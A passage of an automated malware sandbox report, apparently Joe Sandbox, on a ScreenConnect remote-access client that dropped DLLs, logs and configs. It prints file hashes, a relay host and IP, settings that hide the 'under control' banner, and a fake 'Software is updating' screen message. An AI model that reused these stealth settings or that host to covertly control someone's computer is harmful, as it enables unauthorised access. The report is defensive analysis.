                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`...........@.................................5...O.... .................. )...@..........8............................................ ............... ..H............text...X.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................i.......H....... F................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):197120
                                                                                                                                                                                                                                                        Entropy (8bit):6.584712994459805
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:mxGtNaldxI5KY9h12MMusqVFJRJcyzvfquFzDvJXYyB:1tNalc5fr12MbPJY8quFGy
                                                                                                                                                                                                                                                        MD5:4D94014D41DE954AEE952C1B930BA395
                                                                                                                                                                                                                                                        SHA1:35A776D4B569C5367F61A68A577CE92086E682E2
                                                                                                                                                                                                                                                        SHA-256:AD8FC048CE7A61C1AF0428B7B3989163A215A9378417CAC6FBF232D0538405C3
                                                                                                                                                                                                                                                        SHA-512:0ACA355B24FAF86B6C321E88321EFF542F277331745010C3A495AAE6F2F123E518284CB7445F78A83BCE3A61BDFFD1AA3FC082E7DC854218B5D7AF95478414F8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5............" ..0.................. ... ....... .......................`......].....@.................................-...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\1co5soej.newcfg

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):562
                                                                                                                                                                                                                                                        Entropy (8bit):5.071856827733907
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOKTQCDOt/vXbAa3xT:2dL9hK6E46YPoXovH
                                                                                                                                                                                                                                                        MD5:9CC4A91172217A43CDA36ED88FA9CD64
                                                                                                                                                                                                                                                        SHA1:1784CA72723E2C19B5BE41EB0FD062794FD09090
                                                                                                                                                                                                                                                        SHA-256:B241E5DA017F6A21D5F7E37A01CFC5C48B3A3F46E3824FCA78420F3A7AA3694B
                                                                                                                                                                                                                                                        SHA-512:30F2A2B2A3BC5DA6E1294F9F91CAD485BDF1413158FD4C2BD70F9B4DEB64000B019FF6E883DBEDF9B3D8FDCF050A8F61B0F6660ED50290300AA48939A22D11AD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kjh231a.zapto.org=79.110.49.185-25%2f10%2f2024%2017%3a27%3a53</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.Override.en-US.resources

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):359
                                                                                                                                                                                                                                                        Entropy (8bit):4.83753806903797
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:8kVXdyrKDLIP12MUAvvR+oHO8fTG6cAtuRTAlrRF4l10+HwercYn:rHy2DLI4MWoHO8L9cAgRMZRCl1FHcY
                                                                                                                                                                                                                                                        MD5:17702A9E63BED7438F3217D594D6E35C
                                                                                                                                                                                                                                                        SHA1:7C556F344A57D5933A528F8B8CFD0363F15AE0E3
                                                                                                                                                                                                                                                        SHA-256:8BFD7D9E0BAC6BDE538DFBE31E8919933547F30248E747C5B38EB84472DF3701
                                                                                                                                                                                                                                                        SHA-512:642BB2D85ECB653DA779AFFAA4285612BC7EB08383967DB16D9F9CA709F6A46280E6E6C7605E850E5AEC28043828826CA6948982591C310374119785784B303B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP@To...n_%.......&... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.?....=Software is updating... Please do not turn off your computer!..

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.Override.resources

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):256
                                                                                                                                                                                                                                                        Entropy (8bit):4.878405169379307
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2epExpKCl1nSJkw:rHy2DLI4MWoj12eKfKCKB
                                                                                                                                                                                                                                                        MD5:B5450F2285052D7D31714E92BAE6143E
                                                                                                                                                                                                                                                        SHA1:0904C6FE250983A97D5210DFEACCB1C1CF34D643
                                                                                                                                                                                                                                                        SHA-256:23054E289EB585EB0314C44FD753ED3803C012E06B954926F3FC7167A370F928
                                                                                                                                                                                                                                                        SHA-512:79DA469F0C4ACB50D9B399086ED171C69E00C4CF5CB8A2089FD49F5864C1BF46E8434FB23CD210ABB83B88FF06E435A92C8E926B435BFB03EA207D5D7069723E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#03c6fc

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.en-US.resources

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):50133
                                                                                                                                                                                                                                                        Entropy (8bit):4.759054454534641
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                                                                                                        MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                                                                                                        SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                                                                                                        SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                                                                                                        SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.resources

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):26722
                                                                                                                                                                                                                                                        Entropy (8bit):7.7401940386372345
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                                                                                                        MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                                                                                                        SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                                                                                                        SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                                                                                                        SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\app.config

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2089
                                                                                                                                                                                                                                                        Entropy (8bit):4.688974504275539
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHK:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHY
                                                                                                                                                                                                                                                        MD5:6E88FAD97F4CFC0339D8D71F55326EDF
                                                                                                                                                                                                                                                        SHA1:7FE09E6D87B7CA210C8D7AFA9D69380528A6D4F2
                                                                                                                                                                                                                                                        SHA-256:F09E170444003576AD24985C8B4873E7CBDC18863A4943A1FDEB0E3249812806
                                                                                                                                                                                                                                                        SHA-512:023175F24C652E73946A01DB84579BAF00D4447AFA01CD2EA09820964DCA10D9C24C7DD7F37109A836996477B4C9804B75830C95A790B5598564395272F98A15
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\user.config (copy)

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):562
                                                                                                                                                                                                                                                        Entropy (8bit):5.071856827733907
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOKTQCDOt/vXbAa3xT:2dL9hK6E46YPoXovH
                                                                                                                                                                                                                                                        MD5:9CC4A91172217A43CDA36ED88FA9CD64
                                                                                                                                                                                                                                                        SHA1:1784CA72723E2C19B5BE41EB0FD062794FD09090
                                                                                                                                                                                                                                                        SHA-256:B241E5DA017F6A21D5F7E37A01CFC5C48B3A3F46E3824FCA78420F3A7AA3694B
                                                                                                                                                                                                                                                        SHA-512:30F2A2B2A3BC5DA6E1294F9F91CAD485BDF1413158FD4C2BD70F9B4DEB64000B019FF6E883DBEDF9B3D8FDCF050A8F61B0F6660ED50290300AA48939A22D11AD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kjh231a.zapto.org=79.110.49.185-25%2f10%2f2024%2017%3a27%3a53</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):68096
                                                                                                                                                                                                                                                        Entropy (8bit):6.069003835678311
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:vA0ZscQ5V6TsQqoSDih6+39QFVIl1LJhb8gF:o0Zy3IUOQFVQLJF
                                                                                                                                                                                                                                                        MD5:47C0BF8CC60128C530A930637822EA78
                                                                                                                                                                                                                                                        SHA1:6FBAF1C36AF7DFCA4B4970A9F71C1DCD8B7A57F9
                                                                                                                                                                                                                                                        SHA-256:EA71F7DCBE7E754EEF4ED40A931EDA12FEF7063B173A5B1D5095F683B254504C
                                                                                                                                                                                                                                                        SHA-512:D2CBF3BCC53D0D340984617867F22CB43CE5A336B7B844E2F339B308FF28C955F5F3C7217C5ECDFE509B45DBD519BD733C3C9B9C6B8ABA945B8E6A288B495B17
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k............" ..0.............. ... ...@....... ....................................@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1373
                                                                                                                                                                                                                                                        Entropy (8bit):5.369201792577388
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                                                                                                        MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                                                                                                        SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                                                                                                        SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                                                                                                                        SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dfsvc.exe.log

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                        Size (bytes):1662
                                                                                                                                                                                                                                                        Entropy (8bit):5.368796786510097
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
                                                                                                                                                                                                                                                        MD5:F133699E2DFF871CA4DC666762B5A7FF
                                                                                                                                                                                                                                                        SHA1:185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
                                                                                                                                                                                                                                                        SHA-256:9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
                                                                                                                                                                                                                                                        SHA-512:8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):847
                                                                                                                                                                                                                                                        Entropy (8bit):5.345615485833535
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                                                                        MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                                                                        SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                                                                        SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                                                                        SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                                                                        Malicious:false
